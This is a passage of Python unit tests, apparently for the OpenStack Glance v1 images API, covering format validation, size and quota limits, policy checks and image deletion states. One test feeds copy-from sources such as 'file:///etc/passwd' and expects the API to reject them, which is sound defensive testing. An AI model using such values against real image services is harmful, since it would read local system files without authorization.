\'x-image-meta-container-format\': \'bare\',\n }\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n self.assertTrue(\'Invalid disk format\' in res.body, res.body)\n\n def test_configured_container_format_good(self):\n self.config(container_formats=[\'foo\'])\n fixture_headers = {\n \'x-image-meta-store\': \'bad\',\n \'x-image-meta-name\': \'bogus\',\n \'x-image-meta-location\': \'http://localhost:0/image.tar.gz\',\n \'x-image-meta-disk-format\': \'raw\',\n \'x-image-meta-container-format\': \'foo\',\n }\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n\n def test_configured_container_format_bad(self):\n self.config(container_formats=[\'foo\'])\n fixture_headers = {\n \'x-image-meta-store\': \'bad\',\n \'x-image-meta-name\': \'bogus\',\n \'x-image-meta-location\': \'http://localhost:0/image.tar.gz\',\n \'x-image-meta-disk-format\': \'raw\',\n \'x-image-meta-container-format\': \'bar\',\n }\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n self.assertTrue(\'Invalid container format\' in res.body, res.body)\n\n def test_container_and_disk_amazon_format_differs(self):\n fixture_headers = {\n \'x-image-meta-store\': \'bad\',\n \'x-image-meta-name\': \'bogus\',\n \'x-image-meta-location\': 
\'http://localhost:0/image.tar.gz\',\n \'x-image-meta-disk-format\': \'aki\',\n \'x-image-meta-container-format\': \'ami\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n expected = (""Invalid mix of disk and container formats. ""\n ""When setting a disk or container format to one of ""\n ""\'aki\', \'ari\', or \'ami\', ""\n ""the container and disk formats must match."")\n self.assertEquals(res.status_int, 400)\n self.assertTrue(expected in res.body, res.body)\n\n def test_create_with_location_no_container_format(self):\n fixture_headers = {\n \'x-image-meta-store\': \'bad\',\n \'x-image-meta-name\': \'bogus\',\n \'x-image-meta-location\': \'http://localhost:0/image.tar.gz\',\n \'x-image-meta-disk-format\': \'vhd\',\n }\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n self.assertTrue(\'Invalid container format\' in res.body)\n\n def test_bad_container_format(self):\n fixture_headers = {\n \'x-image-meta-store\': \'bad\',\n \'x-image-meta-name\': \'bogus\',\n \'x-image-meta-location\': \'http://localhost:0/image.tar.gz\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'invalid\',\n }\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n self.assertTrue(\'Invalid container format\' in res.body)\n\n def test_bad_image_size(self):\n fixture_headers = {\n \'x-image-meta-store\': \'bad\',\n \'x-image-meta-name\': \'bogus\',\n \'x-image-meta-location\': \'http://example.com/image.tar.gz\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-size\': \'invalid\',\n \'x-image-meta-container-format\': \'bare\',\n }\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n self.assertTrue(\'Incoming image size\' in res.body)\n\n def test_bad_image_name(self):\n fixture_headers = {\n \'x-image-meta-store\': \'bad\',\n \'x-image-meta-name\': \'X\' * 256,\n \'x-image-meta-location\': \'http://example.com/image.tar.gz\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'bare\',\n }\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n def test_add_image_no_location_no_image_as_body(self):\n """"""Tests creates a queued image for no body and no loc header""""""\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n\n res_body = json.loads(res.body)[\'image\']\n self.assertEquals(\'queued\', res_body[\'status\'])\n image_id = res_body[\'id\']\n\n # Test that we are able to edit the Location field\n # per LP Bug #911599\n\n req = webob.Request.blank(""/images/%s"" % 
image_id)\n req.method = \'PUT\'\n req.headers[\'x-image-meta-location\'] = \'http://localhost:0/images/123\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n res_body = json.loads(res.body)[\'image\']\n # Once the location is set, the image should be activated\n # see LP Bug #939484\n self.assertEquals(\'active\', res_body[\'status\'])\n self.assertFalse(\'location\' in res_body) # location never shown\n\n def test_add_image_no_location_no_content_type(self):\n """"""Tests that an image body with no content type header is rejected""""""\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n req.body = ""chunk00000remainder""\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n def test_add_image_size_header_too_big(self):\n """"""Tests raises BadRequest for supplied image size that is too big""""""\n fixture_headers = {\'x-image-meta-size\': CONF.image_size_cap + 1,\n \'x-image-meta-name\': \'fake image #3\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n def test_add_image_size_chunked_data_too_big(self):\n self.config(image_size_cap=512)\n fixture_headers = {\n \'x-image-meta-name\': \'fake image #3\',\n \'x-image-meta-container_format\': \'ami\',\n \'x-image-meta-disk_format\': \'ami\',\n \'transfer-encoding\': \'chunked\',\n \'content-type\': \'application/octet-stream\',\n }\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n\n req.body_file = StringIO.StringIO(\'X\' * (CONF.image_size_cap + 1))\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 413)\n\n def test_add_image_size_data_too_big(self):\n self.config(image_size_cap=512)\n fixture_headers = {\n \'x-image-meta-name\': \'fake image #3\',\n \'x-image-meta-container_format\': \'ami\',\n \'x-image-meta-disk_format\': \'ami\',\n \'content-type\': \'application/octet-stream\',\n }\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n\n req.body = \'X\' * (CONF.image_size_cap + 1)\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n def test_add_image_size_header_exceed_quota(self):\n quota = 500\n self.config(user_storage_quota=quota)\n fixture_headers = {\'x-image-meta-size\': quota + 1,\n \'x-image-meta-name\': \'fake image #3\',\n \'x-image-meta-container_format\': \'bare\',\n \'x-image-meta-disk_format\': \'qcow2\',\n \'content-type\': \'application/octet-stream\',\n }\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n req.body = \'X\' * (quota + 1)\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 413)\n\n def test_add_image_size_data_exceed_quota(self):\n quota = 500\n self.config(user_storage_quota=quota)\n fixture_headers = {\n \'x-image-meta-name\': \'fake image #3\',\n \'x-image-meta-container_format\': \'bare\',\n \'x-image-meta-disk_format\': \'qcow2\',\n \'content-type\': \'application/octet-stream\',\n }\n\n req = 
webob.Request.blank(""/images"")\n req.method = \'POST\'\n\n req.body = \'X\' * (quota + 1)\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 413)\n\n def test_add_image_size_data_exceed_quota_readd(self):\n quota = 500\n self.config(user_storage_quota=quota)\n fixture_headers = {\n \'x-image-meta-name\': \'fake image #3\',\n \'x-image-meta-container_format\': \'bare\',\n \'x-image-meta-disk_format\': \'qcow2\',\n \'content-type\': \'application/octet-stream\',\n }\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n req.body = \'X\' * (quota + 1)\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 413)\n\n used_size = sum([f[\'size\'] for f in self.FIXTURES])\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n req.body = \'X\' * (quota - used_size)\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n\n def _add_check_no_url_info(self):\n\n fixture_headers = {\'x-image-meta-disk-format\': \'ami\',\n \'x-image-meta-container-format\': \'ami\',\n \'x-image-meta-size\': \'0\',\n \'x-image-meta-name\': \'empty image\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n res = req.get_response(self.api)\n res_body = json.loads(res.body)[\'image\']\n self.assertFalse(\'locations\' in res_body)\n self.assertFalse(\'direct_url\' in res_body)\n image_id = res_body[\'id\']\n\n # HEAD empty image\n req = webob.Request.blank(""/images/%s"" % image_id)\n req.method = \'HEAD\'\n res = req.get_response(self.api)\n self.assertEqual(res.status_int, 200)\n self.assertFalse(\'x-image-meta-locations\' in res.headers)\n self.assertFalse(\'x-image-meta-direct_url\' in res.headers)\n\n def test_add_check_no_url_info_ml(self):\n self.config(show_multiple_locations=True)\n self._add_check_no_url_info()\n\n def test_add_check_no_url_info_direct_url(self):\n self.config(show_image_direct_url=True)\n self._add_check_no_url_info()\n\n def test_add_check_no_url_info_both_on(self):\n self.config(show_image_direct_url=True)\n self.config(show_multiple_locations=True)\n self._add_check_no_url_info()\n\n def test_add_check_no_url_info_both_off(self):\n self._add_check_no_url_info()\n\n def test_add_image_zero_size(self):\n """"""Tests creating an active image with explicitly zero size""""""\n fixture_headers = {\'x-image-meta-disk-format\': \'ami\',\n \'x-image-meta-container-format\': \'ami\',\n \'x-image-meta-size\': \'0\',\n \'x-image-meta-name\': \'empty image\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n\n res_body = json.loads(res.body)[\'image\']\n self.assertEquals(\'active\', res_body[\'status\'])\n image_id = res_body[\'id\']\n\n # GET empty image\n req = webob.Request.blank(""/images/%s"" % image_id)\n res = req.get_response(self.api)\n self.assertEqual(res.status_int, 200)\n self.assertEqual(len(res.body), 0)\n\n def _do_test_add_image_attribute_mismatch(self, attributes):\n fixture_headers = {\n \'x-image-meta-name\': \'fake image #3\',\n }\n fixture_headers.update(attributes)\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in 
fixture_headers.iteritems():\n req.headers[k] = v\n\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.body = ""XXXX""\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n def test_add_image_checksum_mismatch(self):\n attributes = {\n \'x-image-meta-checksum\': \'asdf\',\n }\n self._do_test_add_image_attribute_mismatch(attributes)\n\n def test_add_image_size_mismatch(self):\n attributes = {\n \'x-image-meta-size\': str(len(""XXXX"") + 1),\n }\n self._do_test_add_image_attribute_mismatch(attributes)\n\n def test_add_image_checksum_and_size_mismatch(self):\n attributes = {\n \'x-image-meta-checksum\': \'asdf\',\n \'x-image-meta-size\': str(len(""XXXX"") + 1),\n }\n self._do_test_add_image_attribute_mismatch(attributes)\n\n def test_add_image_bad_store(self):\n """"""Tests raises BadRequest for invalid store header""""""\n fixture_headers = {\'x-image-meta-store\': \'bad\',\n \'x-image-meta-name\': \'fake image #3\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.body = ""chunk00000remainder""\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n def test_add_image_basic_file_store(self):\n """"""Tests to add a basic image in the file store""""""\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.body = ""chunk00000remainder""\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n\n # Test that the Location: header is set to the URI to\n # edit the newly-created image, as required by APP.\n # See LP Bug #719825\n self.assertTrue(\'location\' in res.headers,\n ""\'location\' not in response headers.\\n""\n ""res.headerlist = %r"" % res.headerlist)\n res_body = json.loads(res.body)[\'image\']\n self.assertTrue(\'/images/%s\' % res_body[\'id\']\n in res.headers[\'location\'])\n self.assertEquals(\'active\', res_body[\'status\'])\n image_id = res_body[\'id\']\n\n # Test that we are NOT able to edit the Location field\n # per LP Bug #911599\n\n req = webob.Request.blank(""/images/%s"" % image_id)\n req.method = \'PUT\'\n req.headers[\'x-image-meta-location\'] = \'http://example.com/images/123\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n def test_add_image_unauthorized(self):\n rules = {""add_image"": \'!\'}\n self.set_policy_rules(rules)\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.body = ""chunk00000remainder""\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 403)\n\n def test_add_publicize_image_unauthorized(self):\n rules = {""add_image"": \'@\', ""modify_image"": \'@\',\n ""publicize_image"": \'!\'}\n self.set_policy_rules(rules)\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-is-public\': \'true\',\n 
\'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.body = ""chunk00000remainder""\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 403)\n\n def test_add_publicize_image_authorized(self):\n rules = {""add_image"": \'@\', ""modify_image"": \'@\',\n ""publicize_image"": \'@\'}\n self.set_policy_rules(rules)\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-is-public\': \'true\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.body = ""chunk00000remainder""\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n\n def test_add_copy_from_image_unauthorized(self):\n rules = {""add_image"": \'@\', ""copy_from"": \'!\'}\n self.set_policy_rules(rules)\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-glance-api-copy-from\': \'http://glance.com/i.ovf\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #F\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.body = ""chunk00000remainder""\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 403)\n\n def test_add_copy_from_image_authorized(self):\n rules = {""add_image"": \'@\', ""copy_from"": \'@\'}\n self.set_policy_rules(rules)\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-glance-api-copy-from\': \'http://glance.com/i.ovf\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #F\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n\n def test_add_copy_from_with_nonempty_body(self):\n """"""Tests creates an image from copy-from and nonempty body""""""\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-glance-api-copy-from\': \'http://a/b/c.ovf\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #F\'}\n\n req = webob.Request.blank(""/images"")\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.method = \'POST\'\n req.body = ""chunk00000remainder""\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n def test_add_location_with_nonempty_body(self):\n """"""Tests creates an image from location and nonempty body""""""\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-location\': \'http://a/b/c.tar.gz\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #F\'}\n\n req = 
webob.Request.blank(""/images"")\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.method = \'POST\'\n req.body = ""chunk00000remainder""\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n def test_add_location_with_conflict_image_size(self):\n """"""Tests creates an image from location and conflict image size""""""\n\n self.stubs.Set(glance.api.v1.images, \'get_size_from_backend\',\n lambda *args, **kwargs: 2)\n\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-location\': \'http://a/b/c.tar.gz\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #F\',\n \'x-image-meta-size\': \'1\'}\n\n req = webob.Request.blank(""/images"")\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 409)\n\n def test_add_copy_from_with_location(self):\n """"""Tests creates an image from copy-from and location""""""\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-glance-api-copy-from\': \'http://a/b/c.ovf\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #F\',\n \'x-image-meta-location\': \'http://a/b/c.tar.gz\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n def _do_test_post_image_content_missing_format(self, missing):\n """"""Tests creation of an image with missing format""""""\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\'}\n\n header = \'x-image-meta-\' + missing.replace(\'_\', \'-\')\n\n del fixture_headers[header]\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.body = ""chunk00000remainder""\n res = req.get_response(self.api)\n self.assertEqual(res.status_int, 400)\n\n def test_add_copy_from_with_restricted_sources(self):\n """"""Tests creates an image from copy-from with restricted sources""""""\n header_template = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #F\'}\n\n schemas = [""file:///etc/passwd"",\n ""swift+config:///xxx"",\n ""filesystem:///etc/passwd""]\n\n for schema in schemas:\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in six.iteritems(header_template):\n req.headers[k] = v\n req.headers[\'x-glance-api-copy-from\'] = schema\n res = req.get_response(self.api)\n self.assertEqual(400, res.status_int)\n\n def test_post_image_content_missing_disk_format(self):\n """"""Tests creation of an image with missing disk format""""""\n self._do_test_post_image_content_missing_format(\'disk_format\')\n\n def test_post_image_content_missing_container_type(self):\n """"""Tests creation of an image with missing container format""""""\n self._do_test_post_image_content_missing_format(\'container_format\')\n\n def 
_do_test_put_image_content_missing_format(self, missing):\n """"""Tests delayed activation of an image with missing format""""""\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\'}\n\n header = \'x-image-meta-\' + missing.replace(\'_\', \'-\')\n\n del fixture_headers[header]\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n\n res_body = json.loads(res.body)[\'image\']\n self.assertEquals(\'queued\', res_body[\'status\'])\n image_id = res_body[\'id\']\n\n req = webob.Request.blank(""/images/%s"" % image_id)\n req.method = \'PUT\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.body = ""chunk00000remainder""\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n def test_put_image_content_missing_disk_format(self):\n """"""Tests delayed activation of image with missing disk format""""""\n self._do_test_put_image_content_missing_format(\'disk_format\')\n\n def test_put_image_content_missing_container_type(self):\n """"""Tests delayed activation of image with missing container format""""""\n self._do_test_put_image_content_missing_format(\'container_format\')\n\n def test_update_deleted_image(self):\n """"""Tests that exception raised trying to update a deleted image""""""\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n fixture = {\'name\': \'test_del_img\'}\n req = webob.Request.blank(\'/images/%s\' % UUID2)\n req.method = \'PUT\'\n req.content_type = \'application/json\'\n req.body = json.dumps(dict(image=fixture))\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 403)\n self.assertTrue(\'Forbidden to update deleted image\' in res.body)\n\n def test_delete_deleted_image(self):\n """"""Tests that exception raised trying to delete a deleted image""""""\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n # Verify the status is deleted\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'HEAD\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n self.assertEqual(""deleted"", res.headers[\'x-image-meta-status\'])\n\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 404)\n msg = ""Image %s not found."" % UUID2\n self.assertTrue(msg in res.body)\n\n # Verify the status is still deleted\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'HEAD\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n self.assertEqual(""deleted"", res.headers[\'x-image-meta-status\'])\n\n def test_delete_pending_delete_image(self):\n """"""\n Tests that correct response returned when deleting\n a pending_delete image\n """"""\n # First deletion\n self.config(delayed_delete=True, scrubber_datadir=\'/tmp/scrubber\')\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n # Verify the status is pending_delete\n req 
= webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'HEAD\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n self.assertEqual(""pending_delete"", res.headers[\'x-image-meta-status\'])\n\n # Second deletion\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 403)\n self.assertTrue(\'Forbidden to delete a pending_delete image\'\n in res.body)\n\n # Verify the status is still pending_delete\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'HEAD\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n self.assertEqual(""pending_delete"", res.headers[\'x-image-meta-status\'])\n\n def test_register_and_upload(self):\n """"""\n Test that the process of registering an image with\n some metadata, then uploading an image file with some\n more metadata doesn\'t mark the original metadata deleted\n :see LP Bug#901534\n """"""\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\',\n \'x-image-meta-property-key1\': \'value1\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n res_body = json.loads(res.body)[\'image\']\n\n self.assertTrue(\'id\' in res_body)\n\n image_id = res_body[\'id\']\n self.assertTrue(\'/images/%s\' % image_id in res.headers[\'location\'])\n\n # Verify the status is queued\n self.assertTrue(\'status\' in res_body)\n self.assertEqual(\'queued\', res_body[\'status\'])\n\n # Check properties are not deleted\n self.assertTrue(\'properties\' in res_body)\n self.assertTrue(\'key1\' in res_body[\'properties\'])\n self.assertEqual(\'value1\', res_body[\'properties\'][\'key1\'])\n\n # Now upload the image file along with some more\n # metadata and verify original metadata properties\n # are not marked deleted\n req = webob.Request.blank(""/images/%s"" % image_id)\n req.method = \'PUT\'\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.headers[\'x-image-meta-property-key2\'] = \'value2\'\n req.body = ""chunk00000remainder""\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n # Verify the status is now active\n req = webob.Request.blank(""/images/%s"" % image_id)\n req.method = \'HEAD\'\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n self.assertTrue(\'x-image-meta-property-key1\' in res.headers,\n ""Did not find required property in headers. 
""\n ""Got headers: %r"" % res.headers)\n self.assertEqual(""active"", res.headers[\'x-image-meta-status\'])\n\n def test_disable_purge_props(self):\n """"""\n Test the special x-glance-registry-purge-props header controls\n the purge property behaviour of the registry.\n :see LP Bug#901534\n """"""\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\',\n \'x-image-meta-property-key1\': \'value1\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.body = ""chunk00000remainder""\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n res_body = json.loads(res.body)[\'image\']\n\n self.assertTrue(\'id\' in res_body)\n\n image_id = res_body[\'id\']\n self.assertTrue(\'/images/%s\' % image_id in res.headers[\'location\'])\n\n # Verify the status is active\n self.assertTrue(\'status\' in res_body)\n self.assertEqual(\'active\', res_body[\'status\'])\n\n # Check properties are not deleted\n self.assertTrue(\'properties\' in res_body)\n self.assertTrue(\'key1\' in res_body[\'properties\'])\n self.assertEqual(\'value1\', res_body[\'properties\'][\'key1\'])\n\n # Now update the image, setting new properties without\n # passing the x-glance-registry-purge-props header and\n # verify that original properties are marked deleted.\n req = webob.Request.blank(""/images/%s"" % image_id)\n req.method = \'PUT\'\n req.headers[\'x-image-meta-property-key2\'] = \'value2\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n # Verify the original property no longer in headers\n req = webob.Request.blank(""/images/%s"" % image_id)\n req.method = \'HEAD\'\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n self.assertTrue(\'x-image-meta-property-key2\' in res.headers,\n ""Did not find required property in headers. ""\n ""Got headers: %r"" % res.headers)\n self.assertFalse(\'x-image-meta-property-key1\' in res.headers,\n ""Found property in headers that was not expected. ""\n ""Got headers: %r"" % res.headers)\n\n # Now update the image, setting new properties and\n # passing the x-glance-registry-purge-props header with\n # a value of ""false"" and verify that second property\n # still appears in headers.\n req = webob.Request.blank(""/images/%s"" % image_id)\n req.method = \'PUT\'\n req.headers[\'x-image-meta-property-key3\'] = \'value3\'\n req.headers[\'x-glance-registry-purge-props\'] = \'false\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n # Verify the second and third property in headers\n req = webob.Request.blank(""/images/%s"" % image_id)\n req.method = \'HEAD\'\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n 